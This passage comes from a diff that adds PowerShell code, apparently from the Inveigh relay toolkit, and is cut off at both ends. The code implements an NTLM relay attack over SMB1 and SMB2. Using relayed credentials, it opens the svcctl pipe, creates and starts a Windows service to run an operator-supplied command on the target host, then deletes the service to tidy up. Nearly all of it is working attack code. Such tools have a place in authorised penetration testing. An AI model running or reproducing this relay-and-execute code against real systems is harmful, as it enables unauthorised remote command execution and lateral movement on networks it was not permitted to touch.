+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service deleted on $Target") > $null
+ }
+ else
+ {
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBCloseRequest 0x00,0x40
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBTreeDisconnectRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Logoff'
+ }
+
+ 'Logoff'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBLogoffAndXRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ if($SMB_relay_failed)
+ {
+ $SMB_client_stage = 'Exit'
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay failed on $Target") > $null
+ }
+
+ }
+
+ }
+ else
+ {
+
+ $SMB_client_stage = 'TreeConnect'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'TreeConnect'
+ {
+ $SMB2_message_ID = 4
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateRequest'
+ }
+
+ 'CreateRequest'
+ {
+ $SMB2_tree_ID = 0x01,0x00,0x00,0x00
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
+ $packet_SMB2_data["Share_Access"] = 0x07,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'RPCBind'
+ }
+
+ 'RPCBind'
+ {
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadRequest'
+ {
+
+ Start-Sleep -m 150
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditCharge"] = 0x10,0x00
+ $packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+ else
+ {
+ $SMB_client_stage = 'StatusPending'
+ }
+
+ }
+
+ 'StatusPending'
+ {
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ }
+
+ 'OpenSCManagerW'
+ {
+ $SMB2_message_ID = 30
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CheckAccess'
+ }
+
+ 'CheckAccess'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+ $SMB_service_manager_context_handle = $SMB_client_receive[108..127]
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has required privilege on $Target") > $null
+
+ if($Attack -eq 'Session')
+ {
+ $SMB_administrator = $true
+ $SMB_close_service_handle_stage = 2
+ $SMB2_message_ID += 19
+ $SMB_client_stage = 'CloseServiceHandle'
+ }
+ elseif($SCM_data.Length -lt $SMB_split_index)
+ {
+ $SMB_client_stage = 'CreateServiceW'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_First'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
+ {
+
+ if($HTTP_NTLM_domain_string -ne '')
+ {
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ }
+
+ if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target"))
+ {
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ }
+
+ if($Attack -ne 'Session')
+ {
+ $SMB_relay_failed = $true
+ $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target")
+ }
+
+ $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have required privilege on $Target") > $null
+ $SMB_service_manager_context_handle = $SMB_client_receive[108..127]
+ $SMB_close_service_handle_stage = 2
+ $SMB2_message_ID += 19
+ $SMB_client_stage = 'CloseServiceHandle'
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'CreateServiceW'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'CreateServiceW_First'
+ {
+ $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
+ $SMB2_message_ID += 20
+ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
+ $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
+ $SMB_split_index_tracker = $SMB_split_index
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage_final -le 2)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_split_stage = 2
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Middle'
+ {
+ $SMB_split_stage++
+ $SMB2_message_ID++
+ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
+ $SMB_split_index_tracker += $SMB_split_index
+ $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage -ge $SMB_split_stage_final)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $SMB2_message_ID++
+ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
+ $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service created on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute command on $Target") > $null
+ $SMB_service_context_handle = $SMB_client_receive[112..131]
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
+ {
+ $inveigh.console_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service creation failed on $Target") > $null
+ $SMB_relay_failed = $true
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] command executed on $Target") > $null
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service failed to start on $Target") > $null
+ }
+
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] service $SMB_service deleted on $Target") > $null
+ $SMB2_message_ID += 20
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ }
+ else
+ {
+ $SMB2_message_ID++
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($Attack -eq 'Session')
+ {
+ $inveigh.session_message_ID_table[$inveigh.session_count] = $SMB2_message_ID
+ $SMB_client_stage = 'Exit'
+ }
+ else
+ {
+ $SMB_client_stage = 'Logoff'
+ }
+
+ }
+
+ 'Logoff'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ if($SMB_relay_failed -and $Attack -ne 'Session')
+ {
